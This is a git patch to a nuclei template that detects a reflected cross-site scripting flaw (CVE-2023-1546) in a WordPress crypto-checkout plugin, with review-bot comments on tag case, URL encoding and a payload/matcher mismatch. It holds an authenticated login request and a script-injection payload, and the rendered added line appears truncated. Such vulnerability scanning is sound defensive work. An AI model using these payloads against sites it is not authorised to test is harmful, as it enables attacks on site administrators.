From ea472731daa19bbf7fc57b448da45da152c9ce86 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 16 Jul 2023 22:58:45 +0530
Subject: [PATCH] updated payload,matcher,info

---
 http/cves/2023/CVE-2023-1546.yaml | 16 ++++++++++------
 1 file changed, 10 insertions(+), 6 deletions(-)

diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml
index f8345d5a2b..5b07aa2651 100644
--- a/http/cves/2023/CVE-2023-1546.yaml
+++ b/http/cves/2023/CVE-2023-1546.yaml
@@ -1,16 +1,20 @@
 id: CVE-2023-1546
 
 info:
-  name: MyCryptoCheckout < 2.124 - Reflected XSS
+  name: MyCryptoCheckout < 2.124 - Cross-Site Scripting
   author: Harsh
   severity: medium
   description: |
     The plugin does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting
   reference:
     - https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-1546
   classification:
     cve-id: CVE-2023-1546
-  tags: wpscan,cve2023,wordpress,authenticated,cve,wp-plugin,xss
+  metadata:
+    max-request: 2
+    verified: true
+  tags: cve,cve2023,Wordpress,wp,wp-plugin,xss,wpscan,authenticated
 
 http:
   - raw:
@@ -20,12 +24,11 @@ http:
         Content-Type: application/x-www-form-urlencoded
 
         log={{username}}&pwd={{password}}&wp-submit=Log+In
+
       - |
-        GET /wp-admin/options-general.php?page=mycryptocheckout&%22%3E%3Cscript%3Ealert(007)%3C/script%3E HTTP/1.1
+        GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&"> HTTP/1.1
         Host: {{Hostname}}
 
-
-
     cookie-reuse: true
     req-condition: true
     matchers:
@@ -33,5 +36,6 @@ http:
         dsl:
           - 'status_code_2 == 200'
           - 'contains(header_2, "text/html")'
-          - 'contains(body_2, "scriptalert(007)")'
+          - 'contains(body_2, "scriptalert(/XSS/)/script")'
+          - 'contains(body_2, "mycryptocheckout")'
         condition: and
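Review bot: The rewritten `tags:` line mixes cases — `Wordpress` is capitalised while every other tag in the list, and the `wordpress` value on the removed line, is lower-case. Nuclei tags are conventionally lower-case and templates are commonly selected with `-tags wordpress`; if tag matching is case-sensitive in the version in use, this template would silently drop out of that selection. Suggest `tags: cve,cve2023,wordpress,wp,wp-plugin,xss,wpscan,authenticated`. The new `max-request: 2` metadata is consistent with the two raw requests (login POST and GET) that the http block holds.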
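Review bot: The new request line places a raw `"` (and, judging by the matcher in the following hunk, `<`/`>`) unencoded in the request-target, where the removed line percent-encoded the same characters (`%22%3E%3Cscript%3E...`). Those characters are not valid URI syntax, so a front-end proxy or the web server may answer 400 before WordPress sees the request; under `status_code_2 == 200` that surfaces as a silent false negative rather than an error, unless nuclei's client re-encodes them. If the un-encoded form is deliberate, a comment above the request such as `# payload is intentionally sent un-encoded` would stop a later contributor from re-encoding it. As rendered here the added line ends at `&"> HTTP/1.1`, so the full payload is not visible in this hunk, and the enclosing `raw:` list (the first request's POST line) starts above it.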
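Review bot: The new `scriptalert(/XSS/)/script` literal has to equal the payload injected by the second raw request of the previous hunk byte-for-byte, yet nothing ties the two together; a one-line comment above the list, `# literal must equal the payload in the second raw request`, would keep them in step the next time the payload changes (this commit changed both). As rendered here the literal contains no angle brackets, which does not line up with the `">` visible in the request line of the previous hunk — worth confirming the checked-in file carries the full string. The added `contains(body_2, "mycryptocheckout")` check is and-ed with the reflection check, so it can only narrow matches; since the same slug is also the `page=` value of the request it may well be echoed on unrelated admin responses, so it adds little assurance on its own. The enclosing matcher entry (its `- type:` line) starts above this hunk.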